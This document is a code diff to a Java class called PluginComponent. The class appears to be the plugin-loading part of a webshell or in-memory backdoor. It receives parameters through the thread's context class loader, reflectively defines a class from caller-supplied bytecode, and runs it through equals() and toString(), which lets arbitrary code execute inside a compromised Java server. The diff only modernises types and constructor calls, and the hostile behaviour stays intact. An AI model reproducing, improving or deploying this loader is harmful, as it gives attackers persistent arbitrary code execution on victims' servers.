@@ -4,6 +4,7 @@ import javax.management.loading.MLet;
 import java.lang.reflect.Method;
 import java.net.URL;
 import java.util.HashMap;
+import java.util.Map;
 
 /**
  * 插件组件
@@ -15,18 +16,18 @@ import java.util.HashMap;
 public class PluginComponent implements Runnable {
 
     
-    private HashMap params;
-    private HashMap results;
+    private HashMap<String, Object> params;
+    private HashMap<String, Object> results;
 
     
     public void run() {
         java.lang.reflect.InvocationHandler h = (java.lang.reflect.InvocationHandler) Thread.currentThread().getContextClassLoader();
         try {
-            params = (java.util.HashMap) h.invoke(null, null, null);
-            results = new java.util.HashMap();
+            params = copyStringObjectMap(h.invoke(null, null, null));
+            results = new java.util.HashMap<String, Object>();
             invoke();
         } catch (Throwable t) {
-            if (results == null) results = new java.util.HashMap();
+            if (results == null) results = new java.util.HashMap<String, Object>();
             results.put("code", Integer.valueOf(500));
             results.put("msg", t.getMessage());
         }
@@ -41,7 +42,7 @@ public class PluginComponent implements Runnable {
      */
     public void invoke() throws Exception {
         byte[] bytecode = (byte[]) params.get("pluginBytecode");
-        HashMap pluginParam = (HashMap) params.get("pluginParam");
+        HashMap<String, Object> pluginParam = copyStringObjectMap(params.get("pluginParam"));
         
         // 获取defineClass方法
         Method defineClassMethod = ClassLoader.class.getDeclaredMethod(
@@ -58,12 +59,26 @@ public class PluginComponent implements Runnable {
         );
         
         // 创建插件实例并执行
-        Object pluginInstance = pluginClass.newInstance();
+        Object pluginInstance = pluginClass.getDeclaredConstructor().newInstance();
         pluginInstance.equals(pluginParam);
         
         // 获取执行结果
         String result = pluginInstance.toString();
         results.put("result", result);
         results.put("code", 200);
+    }
+
+    private static HashMap<String, Object> copyStringObjectMap(Object value) {
+        HashMap<String, Object> copy = new HashMap<String, Object>();
+        if (!(value instanceof Map)) {
+            return copy;
+        }
+        Map<?, ?> source = (Map<?, ?>) value;
+        for (Map.Entry<?, ?> entry : source.entrySet()) {
+            if (entry.getKey() instanceof String) {
+                copy.put((String) entry.getKey(), entry.getValue());
+            }
+        }
+        return copy;
     }
 }
